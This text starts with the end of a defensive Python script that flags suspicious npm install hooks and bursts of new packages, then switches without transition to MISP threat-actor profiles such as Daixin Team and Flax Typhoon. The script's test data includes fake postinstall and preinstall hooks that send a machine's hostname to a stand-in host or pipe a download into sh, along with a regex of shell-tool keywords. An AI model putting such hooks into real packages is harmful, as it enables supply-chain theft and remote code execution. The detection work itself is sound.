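SUSPICIOUS_CMD = re.compile(r"\b(curl|wget|powershell|bash\s+-c|node\s+-e)\b|https?://", re.I)
NEW_PACKAGE_DAYS = 7
BULK_THRESHOLD = 3  # fresh packages from one maintainer before we call it a cluster


def _created(doc: Dict) -> datetime:
    return datetime.fromisoformat(doc["time"]["created"].replace("Z", "+00:00"))


def triage_package(doc: Dict, now: datetime) -> List[str]:
    """Indicators for a single package (an empty list means nothing stood out)."""
    reasons = []
    latest = doc["versions"][doc["dist-tags"]["latest"]]
    for hook in INSTALL_HOOKS:
        cmd = latest.get("scripts", {}).get(hook, "")
        if SUSPICIOUS_CMD.search(cmd):
            reasons.append(f"{hook} hook executes or fetches: {cmd!r}")
    age = (now - _created(doc)).days
    if age < NEW_PACKAGE_DAYS:
        reasons.append(f"package created {age} day(s) ago")
    return reasons


def bulk_publishers(docs: List[Dict], now: datetime) -> Dict[str, List[str]]:
    """Maintainers with at least BULK_THRESHOLD packages created within NEW_PACKAGE_DAYS."""
    fresh = defaultdict(list)
    for doc in docs:
        if (now - _created(doc)).days < NEW_PACKAGE_DAYS:
            for m in doc.get("maintainers", []):
                fresh[m["name"]].append(doc["name"])
    return {name: sorted(pkgs) for name, pkgs in fresh.items() if len(pkgs) >= BULK_THRESHOLD}


def _packument(name: str, maintainer: str, created: str, scripts: Dict[str, str]) -> Dict:
    """Build a constructed single-version packument."""
    return {
        "name": name,
        "dist-tags": {"latest": "1.0.0"},
        "versions": {"1.0.0": {"name": name, "version": "1.0.0", "scripts": scripts}},
        "time": {"created": created},
        "maintainers": [{"name": maintainer}],
    }


NOW = datetime(2022, 3, 22, tzinfo=timezone.utc)
# Constructed sample registry data (hypothetical names, users and URLs).
EXFIL_HOOK = 'node -e "require(\'https\').get(\'https://collector.example.invalid/?h=\'+require(\'os\').hostname())"'
SAMPLE_DOCS = [
    _packument("pkg-aa", "fresh-user-17", "2022-03-21T10:00:00Z", {"postinstall": EXFIL_HOOK}),
    _packument("pkg-ab", "fresh-user-17", "2022-03-21T10:02:00Z",
               {"preinstall": "curl -s https://collector.example.invalid/i | sh"}),
    _packument("pkg-ac", "fresh-user-17", "2022-03-21T10:04:00Z", {"postinstall": EXFIL_HOOK}),
    _packument("tiny-utils", "acme-dev", "2019-05-01T00:00:00Z", {"build": "tsc -p ."}),
]

if __name__ == "__main__":
    for doc in SAMPLE_DOCS:
        print(doc["name"], triage_package(doc, NOW))
    print(bulk_publishers(SAMPLE_DOCS, NOW))
```

The per-package check is the one to wire into a CI dependency gate (fail the build, or require review, when a new transitive dependency trips it); the cross-package clustering needs a feed of recent registry changes and is what surfaces an automated publishing campaign rather than a single bad package.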
WildCard
Wildcard is a threat actor that initially targeted Israel's educational sector with the SysJoker malware. They have since expanded their operations and developed additional malware variants, disguised as legitimate software, including one written in the Rust programming language called RustDown. Their precise identity remains unknown, but they have shown advanced capabilities and a focus on critical sectors within Israel.
Internal MISP references
UUID dc8a7137-f56e-41db-a500-920e69fa29f5
which can be used as unique global reference for WildCard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
WildPressure
WildPressure is a threat actor that targets industrial-related entities in the Middle East. They use a variety of programming languages, including C++, VBScript, and Python, to develop their malware. They have been observed using virtual private servers and compromised servers, particularly WordPress websites, in their infrastructure. While there are some minor similarities with other threat actors in the region, there is not enough evidence to make any attribution.
Internal MISP references
UUID 89f5a5cb-514f-46db-8959-6bb9aa991e9f
which can be used as unique global reference for WildPressure
in MISP communities and other software using the MISP galaxy
External references
- https://www.redpacketsecurity.com/it-threat-evolution-q3-2021/ - webarchive
- https://securelist.com/wildpressure-targets-macos/103072/ - webarchive
- https://www.redpacketsecurity.com/wildpressure-targets-industrial-related-entities-in-the-middle-east/ - webarchive
- https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
TunnelSnake
The TunnelSnake campaign demonstrates the activity of a sophisticated actor that invests significant resources in designing an evasive toolset and infiltrating networks of high-profile organizations. By leveraging Windows drivers, covert communications channels and proprietary malware, the group behind it maintains a considerable level of stealth. That said, some of its TTPs, like the usage of a commodity webshell and open-source legacy code for loading unsigned drivers, may get detected and in fact were flagged by Kaspersky's product, giving them visibility into the group’s operation.
Internal MISP references
UUID f0bb3d3a-c012-4d12-b621-51192977f190
which can be used as unique global reference for TunnelSnake
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
ScamClub
ScamClub is a threat actor involved in malvertising activities since 2018. They target the Mobile Web market segment, particularly on iOS devices, where security software is often lacking. ScamClub utilizes obfuscation techniques and real-time bidding integration with ad exchanges to push malicious JavaScript payloads, leading to forced redirects and various scams such as phishing and gift card scams.
Internal MISP references
UUID dae45b1c-f957-4242-aa5b-f36b08994bad
which can be used as unique global reference for ScamClub
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Daixin Team
Daixin is a threat actor group that has been active since at least June 2022. They primarily target the healthcare and public health sector with ransomware attacks, stealing sensitive data and threatening to release it if a ransom is not paid. They have successfully targeted various industries, including healthcare, aerospace, automotive, and packaged foods. Daixin gains initial access through VPN servers and exploits vulnerabilities or uses phishing attacks to obtain credentials. They have been responsible for cyberattacks on organizations such as the North Texas Municipal Water District and TransForm Shared Service Org, impacting their networks and stealing customer and patient information.
Internal MISP references
UUID 5e32baed-f4b5-4149-8540-7515ad8c4dc0
which can be used as unique global reference for Daixin Team
in MISP communities and other software using the MISP galaxy
External references
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a - webarchive
- https://www.mycert.org.my/portal/details?menu=431fab9c-d24c-4a27-ba93-e92edafdefa5&id=467c2374-9c18-4fb0-b5a7-155dfca4d611 - webarchive
- https://www.databreaches.net/b-files-leaked/ - webarchive
- https://titaniam.io/ransomware-prevention-daixin-team-ransomware-group/ - webarchive
- https://www.databreaches.net/update-daixin-leaks-more-data-from-bluewater-health-and-other-hospitals-databases-yet-to-be-leaked/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC2717
UNC2717 is a threat actor that engages in espionage activities aligned with Chinese government priorities. They demonstrate advanced tradecraft and take measures to avoid detection, making it challenging for network defenders to identify their tools and intrusion methods. UNC2717, along with other Chinese APT actors, has been observed stealing credentials, email communications, and intellectual property. They have targeted global government agencies using malware such as HARDPULSE, QUIETPULSE, and PULSEJUMP.
Internal MISP references
UUID f1d90b54-4821-41ff-8e07-ac650e0454b7
which can be used as unique global reference for UNC2717
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UNC2659
UNC2659 has been active since at least January 2021. We have observed the threat actor move through the whole attack lifecycle in under 10 days. UNC2659 is notable given their use of an exploit in the SonicWall SMA100 SSL VPN product, which has since been patched by SonicWall. The threat actor appeared to download several tools used for various phases of the attack lifecycle directly from those tools’ legitimate public websites.
Internal MISP references
UUID 697cb051-5315-4026-bf4c-553b49f817a9
which can be used as unique global reference for UNC2659
in MISP communities and other software using the MISP galaxy
AeroBlade
AeroBlade is a previously unknown threat actor that has been targeting an aerospace organization in the United States. Their objective appears to be conducting commercial and competitive cyber espionage. They employ spear-phishing as a delivery mechanism, using weaponized documents with embedded remote template injection techniques and malicious VBA macro code. The attacks have been ongoing since September 2022, with multiple phases identified in the attack chain. The origin and precise objective of AeroBlade remain unknown.
Internal MISP references
UUID 47739f40-c80c-435a-bedc-0d2b38e87ddc
which can be used as unique global reference for AeroBlade
in MISP communities and other software using the MISP galaxy
WIP19
WIP19 is a Chinese-speaking threat group involved in espionage targeting the Middle East and Asia. They utilize a stolen certificate to sign their malware, including SQLMaggie, ScreenCap, and a credential dumper. The group has been observed targeting telecommunications and IT service providers, using toolsets authored by WinEggDrop. WIP19's activities suggest they are after specific information and are part of the broader Chinese espionage landscape.
Internal MISP references
UUID 21bb2dab-4125-4ae8-8966-c7381659e180
which can be used as unique global reference for WIP19
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UNC2447
UNC2447 is a financially motivated threat actor with ties to multiple hacker groups. They have been observed deploying ransomware, including FiveHands and Hello Kitty, and engaging in double extortion tactics. They have been active since at least May 2020 and target organizations in Europe and North America.
Internal MISP references
UUID 590ecec6-4047-4d0f-9143-2e367700423d
which can be used as unique global reference for UNC2447
in MISP communities and other software using the MISP galaxy
External references
- https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire - webarchive
- https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html - webarchive
- http://internal-www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-financially-motivated-aggressive-group-carrying-out-ransomware-campaigns-active-iocs - webarchive
UNC215
UNC215 is a Chinese nation-state threat actor that has been active since at least 2014. They have targeted organizations in various sectors, including government, technology, telecommunications, defense, finance, entertainment, and healthcare. UNC215 has been observed using tools such as Mimikatz, FOCUSFJORD, and HYPERBRO for initial access and post-compromise activities. They have demonstrated a focus on evading detection and have employed tactics such as using trusted third parties, minimizing forensic evidence, and incorporating false flags. UNC215's targets are located globally, with a particular focus on the Middle East, Europe, Asia, and North America.
Internal MISP references
UUID 9795249f-8954-4632-830f-7e1f0ebc1dd5
which can be used as unique global reference for UNC215
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | CN |
DEV-0569
DEV-0569, also known as Storm-0569, is a threat actor group that has been observed deploying the Royal ransomware. They utilize malicious ads and phishing techniques to distribute malware and gain initial access to networks. The group has been linked to the distribution of payloads such as Batloader and has forged relationships with other threat actors. DEV-0569 has targeted various sectors, including healthcare, communications, manufacturing, and education in the United States and Brazil.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEV-0569.
Known Synonyms |
---|
Storm-0569 |
Internal MISP references
UUID e883458d-496f-4a94-b916-4b7b83e3d525
which can be used as unique global reference for DEV-0569
in MISP communities and other software using the MISP galaxy
UAC-0118
From Russia with Love (FRwL) is a threat actor group that emerged during the Russia-Ukraine war in 2022. They primarily engage in DDoS attacks and have targeted critical infrastructure, media, energy, and government entities. FRwL has been linked to the use of the Somnia ransomware, which they employ as a wiper rather than for financial gain. While there is no direct evidence linking FRwL to the Russian Main Intelligence Directorate, it is possible that they coordinate activities with state-aligned hacktivist groups.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UAC-0118.
Known Synonyms |
---|
FRwL |
FromRussiaWithLove |
Internal MISP references
UUID d869486a-ec70-4a74-897e-31aa7b3df48d
which can be used as unique global reference for UAC-0118
in MISP communities and other software using the MISP galaxy
External references
- https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/ - webarchive
- https://spixnet.at/cybersecurity-blog/2022/11/15/russian-hacktivists-hit-ukrainian-orgs-with-ransomware-but-no-ransom-demands/ - webarchive
- https://outpost24.com/blog/ics-attack-classifications/ - webarchive
UAC-0050
UAC-0050 is a threat actor that has been active since 2020, targeting government agencies in Ukraine. They have been distributing the Remcos RAT malware through phishing campaigns, using tactics such as impersonating the Security Service of Ukraine and sending emails with malicious attachments. The group has also been linked to other hacking collectives, such as UAC-0096, and has previously used remote administration tools like Remote Utilities. The motive behind their attacks is likely espionage.
Internal MISP references
UUID e3ff56b6-2663-46bd-9e5c-017a350896d9
which can be used as unique global reference for UAC-0050
in MISP communities and other software using the MISP galaxy
External references
- https://cert.gov.ua/article/3931296 - webarchive
- https://socprime.com/blog/remcos-rat-detection-uac-0050-hackers-launch-phishing-attacks-impersonating-the-security-service-of-ukraine/ - webarchive
- https://socprime.com/blog/new-phishing-attack-detection-attributed-to-the-uac-0050-and-uac-0096-groups-spreading-remcos-spyware/ - webarchive
- https://cert.gov.ua/article/3804703 - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
UNC2630
UNC2630 is a threat actor believed to be affiliated with the Chinese government. They engage in cyber espionage activities, targeting organizations aligned with Beijing's strategic objectives. UNC2630 demonstrates advanced tradecraft and employs various malware families, including SLOWPULSE and RADIALPULSE, to compromise Pulse Secure VPN appliances. They also utilize modified binaries and scripts to maintain persistence and move laterally within compromised networks.
Internal MISP references
UUID 86dfe64e-7101-4d45-bb94-efc40c5e14fe
which can be used as unique global reference for UNC2630
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Sandman APT
First disclosed in 2023, the Sandman APT is likely associated with suspected China-based threat clusters known for using the KEYPLUG backdoor, specifically STORM-0866/Red Dev 40. Sandman is tracked as a distinct cluster, pending additional conclusive information. A notable characteristic is its use of the LuaDream backdoor. LuaDream is based on the Lua platform, a relatively rare occurrence in the cyberespionage domain, historically associated with APTs considered Western or Western-aligned.
Internal MISP references
UUID 00b84012-fa25-4942-ad64-c76be24828a8
which can be used as unique global reference for Sandman APT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Middle East', 'Southeast Asian', 'France', 'Egypt', 'Sudan', 'South Sudan', 'Libya', 'Turkey', 'Saudi Arabia', 'Oman', 'Yemen', 'Sri Lanka', 'India', 'Pakistan', 'Iran', 'Afghanistan', 'Kuwait', 'Iraq', 'United Arab Emirates'] |
cfr-target-category | ['Government', 'Telecommunications'] |
cfr-type-of-incident | Espionage |
country | CN |
references | ['https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/', 'https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/'] |
BiBiGun
A pro-Hamas hacktivist group developed a wiper called BiBi-Linux to target and destroy data on Israeli systems. The malware impersonates ransomware but operates solely to corrupt and delete files, indicating no data theft. A Windows variant, BiBi-Windows, was also discovered, sharing similarities with BiBi-Linux but targeting all files except executables. ESET researchers have named the group behind the wipers BiBiGun. The group's TTPs have shown overlaps with Moses Staff, which is believed to have an Iran nexus.
Internal MISP references
UUID f8054f5b-45e5-4624-b8d0-1b9c30aa084e
which can be used as unique global reference for BiBiGun
in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/ESETresearch/status/1719437301900595444 - webarchive
- https://github.com/knight0x07/BiBi-Windows-Wiper-Analysis?tab=readme-ov-file - webarchive
- https://thehackernews.com/2023/11/new-bibi-windows-wiper-targets-windows.html - webarchive
- https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | PS |
Storm-1283
Storm-1283 is a threat actor that targeted the Microsoft Azure cloud platform. They gained access to user accounts and created OAuth applications using stolen credentials, allowing them to control resources and deploy virtual machines for cryptomining. The targeted organizations incurred significant financial losses ranging from $10,000 to $1.5 million. Storm-1283 utilized compromised accounts and subscriptions to carry out their illicit activities.
Internal MISP references
UUID c9ffcc82-f7ac-46ce-9ea2-91e51d14e11b
which can be used as unique global reference for Storm-1283
in MISP communities and other software using the MISP galaxy
Solntsepek
Solntsepek is a threat actor group with ties to the Russian military unit GRU. They have claimed responsibility for a cyberattack on Kyivstar, a Ukrainian mobile operator, and have been linked to previous attacks on Ukrainian infrastructure. Solntsepek has been associated with the Sandworm hacking group, known for their destructive cyberattacks, including the NotPetya worm. They have also engaged in hostile activities, such as revealing personal details of Ukrainian soldiers.
Internal MISP references
UUID 0b792fbe-87c2-42c5-8d0d-97c7d47078b5
which can be used as unique global reference for Solntsepek
in MISP communities and other software using the MISP galaxy
External references
- https://kyivindependent.com/sbu-russian-hacker-group-reponsible-for-kyiv-star-cyberattack/ - webarchive
- https://dev.ua/ru/news/atakovali-suspilne-provaiderov-i-minrazvitiya-obschin-kto-stoit-za-rossiiskoi-gruppirovkoi-solntsepek-kotoraya-aktivizirovala-napadeniya-na-ukrainskie-struktury - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
UNC4736
UNC4736 is a North Korean threat actor that has been involved in supply chain attacks targeting software chains of 3CX and X_TRADER. They have used malware strains such as TAXHAUL, Coldcat, and VEILEDSIGNAL to compromise Windows and macOS systems. UNC4736 has been linked to financially motivated cybercrime operations, particularly focused on cryptocurrency and fintech-related services. They have also demonstrated infrastructure overlap with other North Korean and APT43 activity.
Internal MISP references
UUID afe5526e-e5e4-4b05-bc69-2bfb6785fc7e
which can be used as unique global reference for UNC4736
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | KP |
GambleForce
GambleForce is a threat actor specializing in SQL injection attacks. They have targeted over 20 websites in various sectors across multiple countries, compromising six companies. GambleForce utilizes publicly available pentesting tools and has been active since mid-September 2023.
Internal MISP references
UUID 94ce7925-1a37-4b02-a25b-b87a389c92b3
which can be used as unique global reference for GambleForce
in MISP communities and other software using the MISP galaxy
GREF
GREF is a China-aligned APT group that has been active since at least March 2017. They are known for using custom backdoors, loaders, and ancillary tools in their targeted attacks. Recently, they have been attributed to two active Android campaigns that distribute the BadBazaar malware through malicious apps on official and alternative app stores. GREF has targeted Android users, particularly Uyghurs and other Turkic ethnic minorities outside of China, using trojanized versions of popular messaging apps like Signal and Telegram.
Internal MISP references
UUID e6d16c22-0780-483c-9920-c1d9f27b10c8
which can be used as unique global reference for GREF
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | CN |
PhantomControl
PhantomControl is a sophisticated threat actor that emerged in November 2023. They utilize phishing emails as their initial infection vector and employ a ScreenConnect client to establish a connection for their malicious activities. Their arsenal includes a VBS script that hides its true intentions and reveals a complex mechanism involving PowerShell scripts and image-based data retrieval. PhantomControl has been associated with the Blind Eagle threat actors, showcasing their versatility and reach.
Internal MISP references
UUID a2208d56-8f08-4ca3-a304-8bdc334b5ebf
which can be used as unique global reference for PhantomControl
in MISP communities and other software using the MISP galaxy
Team-Xecuter
Team-Xecuter is a hacking group led by Gary Bowser, also known as GaryOPA. They were involved in a piracy conspiracy against Nintendo, creating and selling illegal circumvention devices that allowed users to hack video game consoles for playing pirated games. Gary Bowser has admitted his participation in this activity and is facing legal consequences.
Internal MISP references
UUID ef9f4e6d-4262-4fca-9535-56af9e46281f
which can be used as unique global reference for Team-Xecuter
in MISP communities and other software using the MISP galaxy
KelvinSecurity
KelvinSecurity is a hacker group that has been active since at least 2015. They are known for their hacktivist and black hat activities, targeting public and private organizations globally. The group sells and leaks databases, documents, and access belonging to their victims, often on the dark web or their own platforms. They have been involved in attacks against various sectors, including telecommunications, political parties, and healthcare.
Internal MISP references
UUID 7b8845d9-d7f5-4895-9dcc-54da3492bd55
which can be used as unique global reference for KelvinSecurity
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/kaspersky-security-bulletin-apt-predictions-2024/111048/ - webarchive
- https://www.privacyaffairs.com/kelvinsecurity-hacking-group-morena/ - webarchive
- https://www.databreaches.net/bits-n-pieces-trozos-y-piezas-31/ - webarchive
- https://www.ibtimes.com/anonymous-challenges-russias-supposed-cyber-prowess-repeat-rosatom-breach-leaks-data-3505131 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | ES |
Storm-1113
Storm-1113 is a threat actor that acts both as an access broker focused on malware distribution through search advertisements and as an “as-a-service” entity providing malicious installers and landing page frameworks. In Storm-1113 malware distribution campaigns, users are directed to landing pages mimicking well-known software that host installers, often MSI files, that lead to the installation of malicious payloads. Storm-1113 is also the developer of EugenLoader, a commodity malware first observed around November 2022.
Internal MISP references
UUID 993e81e8-63f4-4666-9538-4053a69287ba
which can be used as unique global reference for Storm-1113
in MISP communities and other software using the MISP galaxy
HomeLand Justice
HomeLand Justice is an Iranian state-sponsored cyber threat group that has been active since at least May 2021. They have targeted various organizations, including a well-known telecommunication company and the Albanian Parliament. The group engaged in information operations and messaging campaigns to amplify the impact of their attacks.
Internal MISP references
UUID bfc538e1-9205-420a-8641-6292023ecd08
which can be used as unique global reference for HomeLand Justice
in MISP communities and other software using the MISP galaxy
External references
- https://www.picussecurity.com/resource/blog/cisa-alert-aa22-264a-iranian-homeland-justice-apt-groups-ttp - webarchive
- https://www.attackiq.com/2022/09/23/attack-graph-response-to-us-cert-alert-aa22-264a-iranian-state-actors-conduct-cyber-operations-against-the-government-of-albania/ - webarchive
- https://www.mandiant.com/resources/blog/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
UAC-0099
UAC-0099 is a threat actor that has been active since at least May 2023, targeting Ukrainian entities. They have been observed using a known WinRAR vulnerability to carry out attacks, indicating a level of sophistication. The actor relies on PowerShell and the creation of scheduled tasks to execute malicious VBS files for initial infection. Monitoring and limiting the functionality of these components can help mitigate the risk of UAC-0099 attacks.
Internal MISP references
UUID 267488cb-159a-46d6-a6d6-fe93c90360b2
which can be used as unique global reference for UAC-0099
in MISP communities and other software using the MISP galaxy
Gray Sandstorm
Gray Sandstorm is an Iran-linked threat actor that has been active since at least 2012. They have targeted defense technology companies, maritime transportation companies, and Persian Gulf ports of entry. Their primary method of attack is password spraying, and they have been observed using tools like o365spray. They have a specific focus on US and Israeli targets and are likely operating in support of Iranian interests.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gray Sandstorm.
Known Synonyms |
---|
DEV-0343 |
Internal MISP references
UUID 6ea73b7f-b2e5-4e6d-a1ff-705f91175613
which can be used as unique global reference for Gray Sandstorm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Threatsec
ThreatSec is a hacktivist group that has targeted various organizations, including internet service providers in Gaza. They claim to fight for the rights and freedom of the oppressed and do not prioritize monetary gain. The group is part of the "Five Families" consortium, which includes other hacktivist groups such as GhostSec and Stormous. ThreatSec has been involved in cyberattacks, data breaches, and ransomware activities.
Internal MISP references
UUID 179deaab-12d2-4371-b499-51b925546a22
which can be used as unique global reference for Threatsec
in MISP communities and other software using the MISP galaxy
Cyber Toufan
Cyber Toufan is a threat actor group that has gained prominence for its cyberattacks targeting Israeli organizations. The group's tactics suggest potential nation-state backing, possibly from Iran. They have been involved in hack-and-leak operations, data breaches, and data destruction, impacting over 100 organizations. Cyber Toufan's activities align with geopolitical tensions in the Middle East and their attacks are characterized by a combination of technical breaches and psychological warfare.
Internal MISP references
UUID 3decddc7-e554-48d8-8304-38b243fc9ccb
which can be used as unique global reference for Cyber Toufan
in MISP communities and other software using the MISP galaxy
External references
- https://www.darkreading.com/cyberattacks-data-breaches/-cyber-toufan-hacktivists-leaked-100-plus-israeli-orgs-in-one-month - webarchive
- https://socradar.io/dark-web-profile-cyber-toufan-al-aqsa/ - webarchive
- https://research.checkpoint.com/2023/11th-december-threat-intelligence-report/ - webarchive
- https://blog.polyswarm.io/2023-recap-cyber-activity-in-the-gaza-conflict - webarchive
- https://www.securityweek.com/palestinian-hackers-hit-100-israeli-organizations-in-destructive-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Water Curupira
Since its emergence in 2022, Water Curupira has established itself as a persistent threat actor targeting organizations primarily in South America and Europe. Their modus operandi involves a combination of social engineering tactics and a diversified malware arsenal, including ransomware variants like Black Basta and credential stealers like Cobalt Strike. This multifaceted approach enables them to gain unauthorized access to victim systems, steal sensitive data, and ultimately extort victims through ransomware demands. The group has been actively using Pikabot, a loader malware with similarities to Qakbot, in spam campaigns throughout 2023.
Internal MISP references
UUID a36266ce-2374-472a-a715-13b99e38e74e
which can be used as unique global reference for Water Curupira
in MISP communities and other software using the MISP galaxy
UTA0178
While Volexity largely observed the attacker essentially living off the land, they still deployed a handful of malware files and tools during the course of the incident which primarily consisted of webshells, proxy utilities, and file modifications to allow credential harvesting. Once UTA0178 had access into the network via the ICS VPN appliance, their general approach was to pivot from system to system using compromised credentials. They would then further compromise credentials of users on any new system that was breached, and use these credentials to log into additional systems via RDP. Volexity observed the attacker obtaining credentials in a variety of ways.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UTA0178.
Known Synonyms |
---|
Red Dev 61 |
UNC5221 |
Internal MISP references
UUID f288f686-b5b3-4c86-9960-5f8fb18709a3
which can be used as unique global reference for UTA0178
in MISP communities and other software using the MISP galaxy
External references
- https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-advisory-ivanti-vpn-zero-days-weaponized-by-unc5221-threat-actors-to-deploy-multiple-malware-families-active-iocs/ - webarchive
- https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day - webarchive
- https://quointelligence.eu/2024/01/unc5221-unreported-and-undetected-wirefire-web-shell-variant/ - webarchive
- https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/ - webarchive
- https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | CN |
TAG-28
TAG-28 is a Chinese state-sponsored threat actor that has been targeting Indian organizations, including media conglomerates and government agencies. They have been using the Winnti malware, which is commonly shared among Chinese state-sponsored groups. TAG-28's main objective is to gather intelligence on Indian targets, potentially for espionage purposes.
Internal MISP references
UUID 6c706d8b-95a4-428d-9de5-b68b29b1893c
which can be used as unique global reference for TAG-28
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Flax Typhoon
Flax Typhoon is a Chinese state-sponsored threat actor that primarily targets organizations in Taiwan. They conduct espionage campaigns and focus on gaining and maintaining long-term access to networks using minimal malware. Flax Typhoon relies on tools built into the operating system and legitimate software to remain undetected. They exploit vulnerabilities in public-facing servers, use living-off-the-land techniques, and deploy a VPN connection to maintain persistence and move laterally within compromised networks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Flax Typhoon.
Known Synonyms |
---|
Ethereal Panda |
Storm-0919 |
Internal MISP references
UUID 50ee2b1b-979e-4507-8747-8597a95938f6
which can be used as unique global reference for Flax Typhoon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Cyber Partisans
The Cyber Partisans, a hacktivist group based in Belarus, has been involved in various cyber-attacks targeting organizations and infrastructure in Belarus and Ukraine. They have hacked and wiped the network of the Belarusian Telegraph Agency, targeted the Belarusian Red Cross, and conducted ransomware attacks on the Belarusian Railway and Belarusian State University. The group aims to expose alleged crimes committed by pro-government organizations and disrupt operations supporting the Russian military operation against Ukraine. They have also leaked stolen data to journalists and expressed support for Ukraine.
Internal MISP references
UUID a9f894c6-70ab-4174-b470-5999fe93d4f3
which can be used as unique global reference for Cyber Partisans
in MISP communities and other software using the MISP galaxy
External references
- https://blog.sekoia.io/the-transportation-sector-cyber-threat-overview/ - webarchive
- https://riskybiznews.substack.com/p/risky-biz-news-cyber-partisans-hack - webarchive
- https://therecord.media/cyber-partisans-belarusian-state-university-attack - webarchive
- https://therecord.media/pro-ukraine-hackers-leak-russian-data-in-hopes-someone-will-make-sense-of-it/ - webarchive
- https://therecord.media/this-app-will-self-destruct-how-belarusian-hackers-created-an-alternative-telegram-for-activists/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | BY |
Caliente Bandits
Caliente Bandits is a highly active threat group that targets multiple industries, including finance and entertainment. They distribute the Bandook remote access trojan using Spanish-language lures through low-volume email campaigns. The group primarily impacts individuals with Spanish surnames and conducts reconnaissance to obtain employee data. They masquerade as companies in South America and use Hotmail or Gmail email addresses.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Caliente Bandits.
Known Synonyms |
---|
TA2721 |
Internal MISP references
UUID 6a77a337-bfa0-416c-8c06-1d489d0d6838
which can be used as unique global reference for Caliente Bandits
in MISP communities and other software using the MISP galaxy
Cotton Sandstorm
Cotton Sandstorm is an Iranian threat actor involved in hack-and-leak operations. They have targeted various organizations, including the French satirical magazine Charlie Hebdo, where they obtained and leaked personal information of over 200,000 customers. The group has been linked to the Iranian government and has been sanctioned by the US Treasury.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cotton Sandstorm.
Known Synonyms |
---|
Emennet Pasargad |
Holy Souls |
MARNANBRIDGE |
NEPTUNIUM |
Internal MISP references
UUID bbb389f2-344f-4ca8-a9c9-902061f88deb
which can be used as unique global reference for Cotton Sandstorm
in MISP communities and other software using the MISP galaxy
External references
- https://blog.sekoia.io/iran-cyber-threat-overview/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2023/02/03/dtac-charlie-hebdo-hack-iran-neptunium/ - webarchive
- https://www.ic3.gov/Media/News/2022/220126.pdf - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/threat-briefs/iran-response-for-charlie-hebdo-attacks/ - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
